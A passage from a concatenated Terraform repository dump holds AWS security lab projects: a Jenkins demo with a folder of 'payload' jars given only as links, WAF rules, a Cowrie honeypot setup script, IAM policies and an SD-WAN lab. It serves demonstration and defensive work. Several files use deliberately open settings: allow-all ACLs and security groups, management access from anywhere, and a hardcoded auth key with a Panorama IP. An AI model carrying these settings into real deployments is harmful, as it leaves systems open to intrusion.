https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/jenkins/tini


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/payload/commons-collections-3.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/payload/commons-collections-3.2.1.jar


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/payload/commons-lang-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/payload/commons-lang-2.6.jar


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/payload/commons-logging-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/payload/commons-logging-1.2.jar


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/payload/ezmorph-1.0.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/payload/ezmorph-1.0.6.jar


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/payload/payload.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/payload/payload.jar


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/requirements.txt:
--------------------------------------------------------------------------------
 1 | certifi==2019.3.9
 2 | chardet==3.0.4
 3 | collections2==0.3.0
 4 | idna==2.8
 5 | pan-python==0.14.0
 6 | pandevice==0.6.6
 7 | python-terraform==0.10.0
 8 | requests==2.21.0
 9 | urllib3==1.24.2
10 | xmltodict==0.12.0
11 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/waf_conf/outputs_waf.tf:
--------------------------------------------------------------------------------
1 | output "web_acl_id" {
2 |   value = "${aws_wafregional_web_acl.wafregional_acl.id}"
3 | }
4 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/waf_conf/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | aws_region = "Place Region Here"
 2 | 
 3 | ServerKeyName = "Place AWs Keypair Here"
 4 | 
 5 | bootstrap_s3bucket = "Place S3 Bucket Name Here"
 6 | 
 7 | aws_access_key = "Place AWS API Access Key Here"
 8 | 
 9 | aws_secret_key = "Place AWS API Secret Key Here"
10 | 
11 | waf_prefix = "managed"
12 | 
13 | blacklisted_ips = [
14 |   {
15 |     value = "172.16.0.0/16"
16 | 
17 |     type = "IPV4"
18 |   },
19 |   {
20 |     value = "192.168.0.0/16"
21 | 
22 |     type = "IPV4"
23 |   },
24 |   {
25 |     value = "169.254.0.0/16"
26 | 
27 |     type = "IPV4"
28 |   },
29 |   {
30 |     value = "127.0.0.1/32"
31 | 
32 |     type = "IPV4"
33 |   },
34 |   {
35 |     value = "10.0.0.0/8"
36 | 
37 |     type = "IPV4"
38 |   },
39 | ]
40 | 
41 | admin_remote_ipset = [
42 |   {
43 |     value = "127.0.0.1/32"
44 | 
45 |     type = "IPV4"
46 |   },
47 | ]
48 | 
49 | alb_arn = "aws_lb.panos-alb.arn"
50 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/waf_conf/vars_waf.tf:
--------------------------------------------------------------------------------
 1 | variable "aws_region" {}
 2 | variable "aws_access_key" {}
 3 | variable "aws_secret_key" {}
 4 | variable "waf_prefix" {}
 5 | 
 6 | variable "blacklisted_ips" {
 7 |   type = "list"
 8 | }
 9 | 
10 | variable "admin_remote_ipset" {
11 |   type = "list"
12 | }
13 | 
14 | variable depends_on {
15 |   default = []
16 | 
17 |   type = "list"
18 | }
19 | 
20 | variable "alb_arn" {}
21 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/waf_conf/waf_acl_associate.tf:
--------------------------------------------------------------------------------
 1 | provider "aws" {
 2 |   access_key = "${var.aws_access_key}"
 3 |   secret_key = "${var.aws_secret_key}"
 4 |   region     = "${var.aws_region}"
 5 | }
 6 | data "aws_alb" "panos-alb" {
 7 |   name = "panos-alb"
 8 | }
 9 | data "aws_alb" "native-alb" {
10 |   name = "native-alb"
11 | }
12 | 
13 | resource "aws_wafregional_web_acl_association" "ext-alb" {
14 |   resource_arn = "${data.aws_alb.panos-alb.arn}"
15 |   web_acl_id   = "${aws_wafregional_web_acl.wafregional_acl.id}"
16 | }
17 | resource "aws_wafregional_web_acl_association" "native-alb" {
18 |   resource_arn = "${data.aws_alb.native-alb.arn}"
19 |   web_acl_id   = "${aws_wafregional_web_acl.wafregional_acl.id}"
20 | }
21 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/waf_conf/waf_condition_ip.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_wafregional_ipset" "admin_remote_ipset" {
 2 |   name               = "${var.waf_prefix}-generic-match-admin-remote-ip"
 3 |   ip_set_descriptor  = "${var.admin_remote_ipset}"
 4 | }
 5 | 
 6 | resource "aws_wafregional_ipset" "blacklisted_ips" {
 7 |   name               = "${var.waf_prefix}-generic-match-blacklisted-ips"
 8 |   ip_set_descriptor  = "${var.blacklisted_ips}"
 9 | }
10 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/README.md:
--------------------------------------------------------------------------------
1 | # blue_team_proj
2 | blue_team Project
3 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/blue-team-igw-ngw.tf:
--------------------------------------------------------------------------------
1 | resource "aws_internet_gateway" "blue_team_igw" {
2 |   vpc_id = aws_vpc.main.id
3 | 
4 |   tags = {
5 |     Name = "blue_team"
6 |   }
7 | }
8 | 
9 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/blue-team-vpc-subnets-rt.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_vpc" "main" {
 2 |   cidr_block       = var.blue_team_cidr
 3 |   instance_tenancy = "default"
 4 | 
 5 |   tags = {
 6 |     Name = "blue_team"
 7 |   }
 8 | }
 9 | 
10 | # Subnets
11 | resource "aws_subnet" "blue_team_trust" {
12 |   vpc_id            = aws_vpc.main.id
13 |   cidr_block        = var.blue_team_trust
14 |   availability_zone = data.aws_availability_zones.available.names[0]
15 | 
16 |   tags = {
17 |     Name = "blue_team_trust"
18 |   }
19 | }
20 | 
21 | resource "aws_subnet" "blue_team_untrust" {
22 |   vpc_id            = aws_vpc.main.id
23 |   cidr_block        = var.blue_team_untrust
24 |   availability_zone = data.aws_availability_zones.available.names[0]
25 | 
26 |   tags = {
27 |     Name = "blue_team_untrust"
28 |   }
29 | }
30 | 
31 | resource "aws_subnet" "blue_team_mgmt" {
32 |   vpc_id            = aws_vpc.main.id
33 |   cidr_block        = var.blue_team_mgmt
34 |   availability_zone = data.aws_availability_zones.available.names[0]
35 | 
36 |   tags = {
37 |     Name = "blue_team_mgmt"
38 |   }
39 | }
40 | 
41 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
1 | dns-primary=169.254.169.253
2 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "FW1-MGMT-IP" {
 2 |   value = aws_eip.blue_team_ngfw_mgmt.public_ip
 3 | }
 4 | 
 5 | output "FW1-Untrust-IP" {
 6 |   value = aws_eip.blue_team_ngfw_untrust0.public_ip
 7 | }
 8 | 
 9 | output "Server1-External-IP" {
10 |   value = aws_eip.blue_team_ngfw_untrust1.public_ip
11 | }
12 | 
13 | output "Server2-External-IP" {
14 |   value = aws_eip.blue_team_ngfw_untrust2.public_ip
15 | }
16 | 
17 | output "Server3-External-IP" {
18 |   value = aws_eip.blue_team_ngfw_untrust3.public_ip
19 | }
20 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/providers.tf:
--------------------------------------------------------------------------------
 1 | provider "aws" {
 2 |   access_key = "${var.aws_access_key}"
 3 |   secret_key = "${var.aws_secret_key}"
 4 |   region = var.aws_region
 5 | }
 6 | 
 7 | resource "random_pet" "blue_team" {
 8 | }
 9 | 
10 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/scripts/initialize_cowrie.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | while true
 3 |   do
 4 |     curl -s -S -g --insecure https://www.google.com
 5 |     if [ $? -eq 0 ] ; then
 6 |       break
 7 |     fi
 8 |   sleep 10s
 9 | done
10 | apt-get update
11 | apt-get update
12 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
13 | cd /var/tmp
14 | echo "version: '2'" > docker-compose.yml
15 | echo "services:" >> docker-compose.yml
16 | echo "  cowrie:" >> docker-compose.yml
17 | echo "    restart: always" >> docker-compose.yml
18 | echo "    image: pglynn/cowrie:latest" >> docker-compose.yml
19 | echo "    environment:" >> docker-compose.yml
20 | echo "      - COWRIE_TELNET_ENABLED=yes" >> docker-compose.yml
21 | echo "    ports:" >> docker-compose.yml
22 | echo "      - \"2222:2222\"" >> docker-compose.yml
23 | echo "      - \"2223:2223\"" >> docker-compose.yml
24 | docker-compose up -d
25 | usermod -aG docker ubuntu
26 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | blue_team_trust = "10.0.2.0/24"
 2 | 
 3 | blue_team_untrust = "10.0.1.0/24"
 4 | 
 5 | blue_team_mgmt = "10.0.0.0/24"
 6 | 
 7 | blue_team_server1_ip = "10.0.2.11"
 8 | 
 9 | blue_team_server2_ip = "10.0.2.12"
10 | 
11 | blue_team_server3_ip = "10.0.2.13"
12 | 
13 | blue_team_mysql_ip = "10.0.2.14"
14 | 
15 | server1_initscript_path = "/scripts/initialize_cowrie.sh"
16 | 
17 | server2_initscript_path = "/scripts/initialize_cowrie.sh"
18 | 
19 | server3_initscript_path = "/scripts/initialize_cowrie.sh"
20 | 
21 | mysql_initscript_path = "/scripts/initialize_mysql.sh"
22 | 
23 | fw_untrust_ip0 = "10.0.1.10"
24 | 
25 | fw_untrust_ip1 = "10.0.1.11"
26 | 
27 | fw_untrust_ip2 = "10.0.1.12"
28 | 
29 | fw_untrust_ip3 = "10.0.1.13"
30 | 
31 | fw_trust_ip = "10.0.2.10"
32 | 
33 | fw_mgmt_ip = "10.0.0.10"
34 | 
35 | content_bucket = "security-framework-us-west-2"
36 | 
37 | blue_team_cidr = "10.0.0.0/16"
38 | 
39 | aws_region = "us-west-2"
40 | 
41 | aws_key_pair = "<AWS SSH Key Name>"
42 | 
43 | aws_access_key = "<AWS Access Key>"
44 | 
45 | aws_secret_key = "<AWS Secret Key>"
46 | 
47 | mgmt_ip = "0.0.0.0/0"
48 | 


--------------------------------------------------------------------------------
/aws/PANW-Honeypot-Demo/versions.tf:
--------------------------------------------------------------------------------
1 | 
2 | terraform {
3 |   required_version = ">= 0.12"
4 | }
5 | 


--------------------------------------------------------------------------------
/aws/README.md:
--------------------------------------------------------------------------------
1 | Terraform for AWS
2 | 


--------------------------------------------------------------------------------
/aws/RedLock-IAMroles-tf/readme.MD:
--------------------------------------------------------------------------------
1 | Terraform scrript for RedLock IAM role provisioning.
2 | 


--------------------------------------------------------------------------------
/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "Version": "2012-10-17",
 3 |     "Statement": [
 4 |       {
 5 |                   "Action": [
 6 |                     "apigateway:GET",
 7 |                     "cognito-identity:ListTagsForResource",
 8 |                     "cognito-idp:ListTagsForResource",
 9 |                     "elasticbeanstalk:ListTagsForResource",
10 |                     "elasticfilesystem:DescribeTags",
11 |                     "glacier:GetVaultLock",
12 |                     "glacier:ListTagsForVault",
13 |                     "logs:GetLogEvents",
14 |                     "secretsmanager:DescribeSecret",
15 |                     "ssm:GetParameters",
16 |                     "ssm:ListTagsForResource",
17 |                     "sqs:SendMessage",
18 |                     "elasticmapreduce:ListSecurityConfigurations",
19 |                     "sns:listSubscriptions"
20 |                   ],
21 |         "Effect": "Allow",
22 |         "Resource": "*"
23 |       }
24 |     ]
25 |    }
26 | 


--------------------------------------------------------------------------------
/aws/RedLock-IAMroles-tf/readonly/variables.tf:
--------------------------------------------------------------------------------
 1 | variable "rl_ro_id" {
 2 |     type = "string"
 3 |     description = "Provide an ExternalID (Example: Xoih821ddwf). ExternalID must contain alphanumeric characters and only these special characters are allowed =,.@:/-. "
 4 | }
 5 | 
 6 | variable "rl_ro_role_name" {
 7 |     type = "string"
 8 |     description = "Provide an role ARN name (Example: RedlockReadOnlyRole)"
 9 | }
10 | 
11 | variable "aws_access_key" {
12 |     type = "string"
13 |     description = "Enter AWS access key"
14 | }
15 | 
16 | variable "aws_secret_key" {
17 |     type = "string"
18 |     description = "Enter AWS secret key"
19 | }
20 | 
21 | variable "aws_region" {
22 |     type = "string"
23 |     description = "Pick a region"
24 | }
25 | 
26 | 


--------------------------------------------------------------------------------
/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "Version": "2012-10-17",
 3 |     "Statement": [
 4 |       {
 5 |                   "Action": [
 6 |                     "apigateway:GET",
 7 |                     "cognito-identity:ListTagsForResource",
 8 |                     "cognito-idp:ListTagsForResource",
 9 |                     "elasticbeanstalk:ListTagsForResource",
10 |                     "elasticfilesystem:DescribeTags",
11 |                     "glacier:GetVaultLock",
12 |                     "glacier:ListTagsForVault",
13 |                     "logs:GetLogEvents",
14 |                     "secretsmanager:DescribeSecret",
15 |                     "ssm:GetParameters",
16 |                     "ssm:ListTagsForResource",
17 |                     "sqs:SendMessage",
18 |                     "elasticmapreduce:ListSecurityConfigurations",
19 |                     "sns:listSubscriptions"
20 |                   ],
21 |         "Effect": "Allow",
22 |         "Resource": "*"
23 |       }
24 |     ]
25 |    }
26 | 


--------------------------------------------------------------------------------
/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_remediation.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "Version": "2012-10-17",
 3 |     "Statement": [
 4 |       {
 5 |         "Action": [
 6 |             "iam:UpdateAccountPasswordPolicy",
 7 |             "ec2:ModifyImageAttribute",
 8 |             "rds:ModifyDBSnapshotAttribute",
 9 |             "s3:PutBucketAcl",
10 |             "ec2:RevokeSecurityGroupIngress"
11 |           ],
12 |         "Effect": "Allow",
13 |         "Resource": "*"
14 |       }
15 |     ]
16 |    }


--------------------------------------------------------------------------------
/aws/RedLock-IAMroles-tf/readwrite/variables.tf:
--------------------------------------------------------------------------------
 1 | variable "rl_rw_id" {
 2 |     type = "string"
 3 |     description = "Provide an ExternalID (Example: Xoih821ddwf). ExternalID must contain alphanumeric characters and only these special characters are allowed =,.@:/-. "
 4 | }
 5 | 
 6 | variable "rl_rw_role_name" {
 7 |     type = "string"
 8 |     description = "Provide an role ARN name (Example: RedlockReadWriteRole)"
 9 | }
10 | 
11 | variable "aws_access_key" {
12 |     type = "string"
13 |     description = "Enter AWS access key"
14 | }
15 | 
16 | variable "aws_secret_key" {
17 |     type = "string"
18 |     description = "Enter AWS secret key"
19 | }
20 | 
21 | variable "aws_region" {
22 |     type = "string"
23 |     description = "Pick a region"
24 | }
25 | 
26 | 


--------------------------------------------------------------------------------
/aws/TGW-RT-Build-Skeleton/aws_creds.tf:
--------------------------------------------------------------------------------
1 | provider "aws" {
2 |   access_key = "XXXXXXXXXXXX"
3 |   secret_key = "XXXXXXXXXXXX"
4 |   region     = "${var.aws_region}"
5 | }
6 | 


--------------------------------------------------------------------------------
/aws/TGW-RT-Build-Skeleton/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "Transit Gateway ID" {
 2 |   value = "${aws_ec2_transit_gateway.tgw.id}"
 3 | }
 4 | 
 5 | output "TGW Route Table - Security" {
 6 |   value = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
 7 | }
 8 | 
 9 | output "TGW Route Table - Spokes" {
10 |   value = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
11 | }


--------------------------------------------------------------------------------
/aws/TGW-RT-Build-Skeleton/tgw.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_ec2_transit_gateway" "tgw" {
 2 |   description                     = "Transit Gateway"
 3 |   vpn_ecmp_support                = "enable"
 4 |   default_route_table_association = "disable"
 5 |   default_route_table_propagation = "disable"
 6 |   dns_support                     = "enable"
 7 |   auto_accept_shared_attachments  = "disable"
 8 | 
 9 |   tags = {
10 |     Name = "transit_gateway"
11 |   }
12 | }
13 | 
14 | resource "aws_ec2_transit_gateway_route_table" "tgw_security" {
15 |   transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
16 | 
17 |   tags = {
18 |     Name = "security-tgw-rtb"
19 |   }
20 | }
21 | 
22 | resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" {
23 |   transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
24 | 
25 |   tags = {
26 |     Name = "spokes-tgw-rtb"
27 |     Propagation = "NS"
28 |   }
29 | }
30 | 


--------------------------------------------------------------------------------
/aws/TGW-RT-Build-Skeleton/variables.tf:
--------------------------------------------------------------------------------
1 | variable aws_region {
2 |   description = "AWS Region for deployment"
3 |   default     = "ap-southeast-2"
4 | }


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/bootstrap_files/authcodes:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=8.8.8.8
13 | dns-secondary=
14 | vm-auth-key=
15 | op-command-modes=mgmt-interface-swap
16 | dhcp-send-hostname=yes
17 | dhcp-send-client-id=yes
18 | dhcp-accept-server-hostname=yes
19 | dhcp-accept-server-domain=yes
20 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=8.8.8.8
13 | dns-secondary=
14 | vm-auth-key=
15 | op-command-modes=mgmt-interface-swap
16 | dhcp-send-hostname=yes
17 | dhcp-send-client-id=yes
18 | dhcp-accept-server-hostname=yes
19 | dhcp-accept-server-domain=yes
20 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=8.8.8.8
13 | dns-secondary=
14 | vm-auth-key=
15 | op-command-modes=mgmt-interface-swap
16 | dhcp-send-hostname=yes
17 | dhcp-send-client-id=yes
18 | dhcp-accept-server-hostname=yes
19 | dhcp-accept-server-domain=yes
20 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=8.8.8.8
13 | dns-secondary=
14 | vm-auth-key=
15 | op-command-modes=mgmt-interface-swap
16 | dhcp-send-hostname=yes
17 | dhcp-send-client-id=yes
18 | dhcp-accept-server-hostname=yes
19 | dhcp-accept-server-domain=yes
20 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC-Mirroring/providers.tf:
--------------------------------------------------------------------------------
1 | provider "aws" {
2 |   region     = "${var.aws_region}"
3 | }
4 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC/bootstrap_files/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=FW-1
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=
13 | dns-secondary=
14 | op-command-modes=mgmt-interface-swap
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=yes
18 | dhcp-accept-server-domain=yes
19 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC/bootstrap_files2/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=FW-2
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=
13 | dns-secondary=
14 | op-command-modes=mgmt-interface-swap
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=yes
18 | dhcp-accept-server-domain=yes
19 | 


--------------------------------------------------------------------------------
/aws/TGW-VPC/providers.tf:
--------------------------------------------------------------------------------
1 | provider "aws" {
2 |   region     = "${var.aws_region}"
3 | }
4 | 


--------------------------------------------------------------------------------
/aws/VPC_Mirror_Target/bootstrap_files3/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=8.8.8.8
13 | dns-secondary=
14 | vm-auth-key=
15 | op-command-modes=mgmt-interface-swap
16 | dhcp-send-hostname=yes
17 | dhcp-send-client-id=yes
18 | dhcp-accept-server-hostname=yes
19 | dhcp-accept-server-domain=yes
20 | 


--------------------------------------------------------------------------------
/aws/VPC_Mirror_Target/bootstrap_files4/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=8.8.8.8
13 | dns-secondary=
14 | vm-auth-key=
15 | op-command-modes=mgmt-interface-swap
16 | dhcp-send-hostname=yes
17 | dhcp-send-client-id=yes
18 | dhcp-accept-server-hostname=yes
19 | dhcp-accept-server-domain=yes
20 | 


--------------------------------------------------------------------------------
/aws/VPC_Mirror_Target/providers.tf:
--------------------------------------------------------------------------------
1 | provider "aws" {
2 |   region     = "${var.aws_region}"
3 | }
4 | 


--------------------------------------------------------------------------------
/aws/sdwan-lab/access-control-lists.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_network_acl" "allow-all" {
 2 |   vpc_id = "${aws_vpc.SDWAN.id}"
 3 |   subnet_ids = ["${aws_subnet.SD-WAN-MGT.id}","${aws_subnet.SD-WAN-WAN1.id}","${aws_subnet.SD-WAN-WAN2.id}","${aws_subnet.SD-WAN-WAN3.id}","${aws_subnet.SD-WAN-WAN4.id}","${aws_subnet.SD-WAN-MPLS.id}","${aws_subnet.SD-WAN-Branch25.id}","${aws_subnet.SD-WAN-Branch50.id}","${aws_subnet.SD-WAN-Hub.id}",]
 4 | 
 5 |   egress {
 6 |     protocol   = "-1"
 7 |     rule_no    = 2
 8 |     action     = "allow"
 9 |     cidr_block = "0.0.0.0/0"
10 |     from_port  = 0
11 |     to_port    = 0
12 |   }
13 | 
14 |   ingress {
15 |     protocol   = "-1"
16 |     rule_no    = 1
17 |     action     = "allow"
18 |     cidr_block = "0.0.0.0/0"
19 |     from_port  = 0
20 |     to_port    = 0
21 |   }
22 | 
23 |   tags {
24 |     Name = "allow-all"
25 |   }
26 | }


--------------------------------------------------------------------------------
/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=FW-1
 8 | vm-auth-key=649475581476015
 9 | panorama-server=52.35.104.230
10 | panorama-server-2=
11 | tplname=tgw-vpc-az1-stack
12 | dgname=tgw-vpc-az1
13 | dns-primary=
14 | dns-secondary=
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=yes
18 | dhcp-accept-server-domain=yes


--------------------------------------------------------------------------------
/aws/sdwan-lab/branch50-fw-bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=FW-1
 8 | vm-auth-key=649475581476015
 9 | panorama-server=52.35.104.230
10 | panorama-server-2=
11 | tplname=tgw-vpc-az1-stack
12 | dgname=tgw-vpc-az1
13 | dns-primary=
14 | dns-secondary=
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=yes
18 | dhcp-accept-server-domain=yes


--------------------------------------------------------------------------------
/aws/sdwan-lab/hub-fw-bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=FW-1
 8 | vm-auth-key=649475581476015
 9 | panorama-server=52.35.104.230
10 | panorama-server-2=
11 | tplname=tgw-vpc-az1-stack
12 | dgname=tgw-vpc-az1
13 | dns-primary=
14 | dns-secondary=
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=yes
18 | dhcp-accept-server-domain=yes


--------------------------------------------------------------------------------
/aws/sdwan-lab/internet-gateway.tf:
--------------------------------------------------------------------------------
1 | resource "aws_internet_gateway" "SDWAN-IGW" {
2 |   vpc_id = "${aws_vpc.SDWAN.id}"
3 | 
4 |   tags {
5 |     Name = "SDWAN-IGW"
6 |   }
7 | }


--------------------------------------------------------------------------------
/aws/sdwan-lab/public-ips.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_eip" "panorama-mgt" {
 2 |   vpc   = true
 3 |   depends_on = ["aws_vpc.SDWAN", "aws_internet_gateway.SDWAN-IGW"]
 4 | }
 5 | 
 6 | resource "aws_eip" "hub-fw-mgt" {
 7 |   vpc   = true
 8 |   depends_on = ["aws_vpc.SDWAN", "aws_internet_gateway.SDWAN-IGW"]
 9 | }
10 | 
11 | resource "aws_eip" "branch25-fw-mgt" {
12 |   vpc   = true
13 |   depends_on = ["aws_vpc.SDWAN", "aws_internet_gateway.SDWAN-IGW"]
14 | }
15 | 
16 | resource "aws_eip" "branch50-fw-mgt" {
17 |   vpc   = true
18 |   depends_on = ["aws_vpc.SDWAN", "aws_internet_gateway.SDWAN-IGW"]
19 | }


--------------------------------------------------------------------------------
/aws/sdwan-lab/route-tables.tf:
--------------------------------------------------------------------------------
 1 | # Route Tables
 2 | resource "aws_route_table" "public" {
 3 |   vpc_id = "${aws_vpc.SDWAN.id}"
 4 | 
 5 |   tags {
 6 |     Name = "Public"
 7 |   }
 8 | 
 9 |   route {
10 |     cidr_block = "0.0.0.0/0"
11 |     gateway_id = "${aws_internet_gateway.SDWAN-IGW.id}"
12 |   }
13 | }
14 | # Association
15 | 
16 | resource "aws_route_table_association" "mgt" {
17 |   subnet_id      = "${aws_subnet.SD-WAN-MGT.id}"
18 |   route_table_id = "${aws_route_table.public.id}"
19 | }


--------------------------------------------------------------------------------
/aws/sdwan-lab/security-groups.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_security_group" "allow-all" {
 2 |   name        = "allow-all"
 3 |   description = "Wide open security group"
